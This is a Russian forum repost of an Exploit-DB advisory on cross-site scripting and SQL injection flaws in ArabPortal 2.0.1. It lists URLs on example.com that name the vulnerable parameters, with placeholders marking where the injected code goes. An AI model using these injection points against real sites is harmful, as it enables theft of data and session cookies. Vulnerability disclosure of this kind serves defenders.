Exploit ArabPortal 2.0.1 - Multiple Input Validation Vulnerabilities

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
27567
Проверка EDB
  1. Пройдено
Автор
O.Y.6
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2006-04-04
Код:
source: https://www.securityfocus.com/bid/17375/info

ArabPortal is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. 

Successful exploitation of these vulnerabilities could allow an attacker to compromise the application, access or modify data, steal cookie-based authentication credentials, or even exploit vulnerabilities in the underlying database implementation. Other attacks are also possible.

http://www.example.com/forum.php?mineID=[SQL Injection]

http://www.example.com/forum.php?action=view&id=1&cat_id=3&adminJump=D3vil-0x1[HTML - XSS ]
http://www.example.com/forum.php?action=view&id=1&cat_id=3&forum_middle=D3vil-0x1[HTML - XSS ]
http://www.example.com/members.php?action=changepass&form=D3vil-0x1[HTML - XSS ]
http://www.example.com/members.php?action=edit&form=D3vil-0x1[HTML - XSS ]
http://www.example.com/pm.php?action=reply&form=D3vil-0x1[HTML - XSS ]
http://www.example.com/pm.php?action=sendmsg&form=D3vil-0x1[HTML - XSS ]
http://www.example.com/mail.php?action=sendpage&form=D3vil-0x1[HTML - XSS ]
http://www.example.com/mail.php?action=sendtome&form=D3vil-0x1[HTML - XSS ]
http://www.example.com/mail.php?action=sendtousers&userid=1&form=D3vil-0x1[HTML - XSS ]
 
Источник
www.exploit-db.com

Похожие темы